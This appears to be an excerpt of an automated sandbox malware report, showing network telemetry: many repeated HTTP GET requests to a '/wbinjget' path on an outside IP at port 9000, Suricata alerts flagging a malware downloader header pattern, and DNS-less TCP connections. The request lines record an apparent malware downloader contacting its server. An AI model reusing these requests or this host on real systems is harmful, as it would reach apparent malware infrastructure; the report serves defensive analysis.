                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: Joe Sandbox ViewASN Name: MEDIALAND-ASRU MEDIALAND-ASRU
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49761 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49800 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49804 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49825 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49834 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49839 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49841 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49846 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49852 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49769 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49855 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49860 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49865 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49870 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49813 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49879 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49882 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49904 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49909 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49919 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49915 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49922 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49930 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49936 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49939 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49940 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49944 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49950 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49953 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49956 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49967 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49971 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49972 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49985 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49996 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49997 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49999 -> 45.141.84.168:9000
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.84.168
